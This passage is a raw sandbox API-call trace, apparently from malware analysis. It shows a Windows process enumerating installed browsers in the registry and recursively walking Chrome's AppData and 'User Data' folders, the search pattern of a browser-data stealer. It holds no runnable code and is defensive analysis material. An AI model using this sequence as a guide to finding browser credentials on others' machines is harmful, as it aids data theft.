lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0161.287] RegCloseKey (hKey=0x148) returned 0x0 [0161.287] VirtualQuery (in: lpAddress=0x910b78, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x910000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xb000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.287] GetProcessHeap () returned 0x8e0000 [0161.287] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x910b78 | out: hHeap=0x8e0000) returned 1 [0161.287] VirtualQuery (in: lpAddress=0x90b458, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x90b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.287] GetProcessHeap () returned 0x8e0000 [0161.287] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90b458 | out: hHeap=0x8e0000) returned 1 [0161.287] RegEnumKeyExW (in: hKey=0x100, dwIndex=0x3, lpName=0x90fb70, lpcchName=0x2dfab4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox 25.0", lpcchName=0x2dfab4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0161.287] RegCloseKey (hKey=0x100) returned 0x0 [0161.287] VirtualQuery (in: lpAddress=0x90fb70, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x90f000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.287] GetProcessHeap () returned 0x8e0000 [0161.287] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90fb70 | out: hHeap=0x8e0000) returned 1 [0161.288] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0161.288] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0161.288] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfadc*=0xff, cb=0x4, pcbWritten=0x2dfad4 | out: pcbWritten=0x2dfad4*=0x4) returned 0x0 [0161.288] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0161.288] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0161.288] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfadc*=0x0, cb=0x4, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x4) returned 0x0 [0161.288] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfae8*=0x3, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0161.288] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfaec*=0x0, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0161.288] GetProcessHeap () returned 0x8e0000 [0161.288] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0161.288] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0161.288] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0161.288] lstrlenW (lpString="\\Google\\Chrome") returned 14 [0161.288] GetProcessHeap () returned 0x8e0000 [0161.288] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x78) returned 0x8efd30 [0161.288] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0161.288] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\Google\\Chrome" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome" [0161.288] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.288] GetProcessHeap () returned 0x8e0000 [0161.288] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0161.288] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome") returned 59 [0161.288] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome") returned 59 [0161.288] lstrlenW (lpString="\\*.*") returned 4 [0161.288] GetProcessHeap () returned 0x8e0000 [0161.289] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x80) returned 0x90a830 [0161.289] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome" [0161.289] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome\\*.*" [0161.289] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Google\\Chrome\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x926360, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x926360, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0xa, ftLastWriteTime.dwHighDateTime=0xc, nFileSizeHigh=0x8e0150, nFileSizeLow=0x23200003, dwReserved0=0x90a82b, dwReserved1=0x3d00003d, cFileName="\x10", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0161.289] VirtualQuery (in: lpAddress=0x90a830, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x90a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x11000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.289] GetProcessHeap () returned 0x8e0000 [0161.289] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90a830 | out: hHeap=0x8e0000) returned 1 [0161.289] VirtualQuery (in: lpAddress=0x8efd30, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.289] GetProcessHeap () returned 0x8e0000 [0161.289] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efd30 | out: hHeap=0x8e0000) returned 1 [0161.289] GetProcessHeap () returned 0x8e0000 [0161.289] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0161.289] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0161.290] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0161.290] lstrlenW (lpString="\\Google\\Chrome") returned 14 [0161.290] GetProcessHeap () returned 0x8e0000 [0161.290] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x74) returned 0x8efdb0 [0161.290] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0161.290] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Google\\Chrome" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome" [0161.290] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.290] GetProcessHeap () returned 0x8e0000 [0161.290] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0161.290] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned 57 [0161.291] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned 57 [0161.291] lstrlenW (lpString="\\*.*") returned 4 [0161.291] GetProcessHeap () returned 0x8e0000 [0161.291] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7c) returned 0x926360 [0161.291] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome" [0161.291] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*.*" [0161.291] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x58, dwReserved1=0x10000010, cFileName=".", cAlternateFileName="")) returned 0x8f9a40 [0161.291] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.291] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="..", cAlternateFileName="")) returned 1 [0161.291] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.291] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.291] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="User Data", cAlternateFileName="USERDA~1")) returned 1 [0161.292] lstrcmpiW (lpString1="User Data", lpString2=".") returned 1 [0161.292] lstrcmpiW (lpString1="User Data", lpString2="..") returned 1 [0161.292] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned 57 [0161.292] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned 57 [0161.292] lstrlenW (lpString="\\") returned 1 [0161.292] GetProcessHeap () returned 0x8e0000 [0161.292] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x76) returned 0x8efe30 [0161.292] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome" [0161.292] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\" [0161.292] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\") returned 58 [0161.292] lstrlenW (lpString="User Data") returned 9 [0161.292] GetProcessHeap () returned 0x8e0000 [0161.292] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x88) returned 0x9263e8 [0161.292] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\" [0161.292] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\", lpString2="User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0161.292] VirtualQuery (in: lpAddress=0x8efe30, lpBuffer=0x2df7f8, dwLength=0x1c | out: lpBuffer=0x2df7f8*(BaseAddress=0x8ef000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.292] GetProcessHeap () returned 0x8e0000 [0161.292] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8efe30 | out: hHeap=0x8e0000) returned 1 [0161.292] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0161.292] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0161.292] lstrlenW (lpString="\\*.*") returned 4 [0161.292] GetProcessHeap () returned 0x8e0000 [0161.292] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x90) returned 0x926478 [0161.292] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0161.292] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*" [0161.292] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9a80 [0161.422] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.422] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.431] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.431] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.431] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CertificateTransparency", cAlternateFileName="CERTIF~1")) returned 1 [0161.431] lstrcmpiW (lpString1="CertificateTransparency", lpString2=".") returned 1 [0161.431] lstrcmpiW (lpString1="CertificateTransparency", lpString2="..") returned 1 [0161.431] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0161.431] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0161.431] lstrlenW (lpString="\\") returned 1 [0161.431] GetProcessHeap () returned 0x8e0000 [0161.431] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0161.431] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0161.431] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0161.431] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0161.432] lstrlenW (lpString="CertificateTransparency") returned 23 [0161.432] GetProcessHeap () returned 0x8e0000 [0161.432] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb8) returned 0x925360 [0161.432] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0161.432] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="CertificateTransparency" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency" [0161.432] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.432] GetProcessHeap () returned 0x8e0000 [0161.432] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0161.432] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 91 [0161.432] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 91 [0161.432] lstrlenW (lpString="\\*.*") returned 4 [0161.432] GetProcessHeap () returned 0x8e0000 [0161.432] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x925420 [0161.432] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency" [0161.432] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*.*" [0161.432] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*.*", lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0161.433] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.433] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.433] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.433] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.433] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0161.433] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0161.433] VirtualQuery (in: lpAddress=0x925420, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.433] GetProcessHeap () returned 0x8e0000 [0161.433] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925420 | out: hHeap=0x8e0000) returned 1 [0161.433] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.433] GetProcessHeap () returned 0x8e0000 [0161.433] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0161.433] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crashpad", cAlternateFileName="")) returned 1 [0161.433] lstrcmpiW (lpString1="Crashpad", lpString2=".") returned 1 [0161.433] lstrcmpiW (lpString1="Crashpad", lpString2="..") returned 1 [0161.433] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0161.433] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0161.433] lstrlenW (lpString="\\") returned 1 [0161.433] GetProcessHeap () returned 0x8e0000 [0161.433] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0161.433] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0161.433] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") 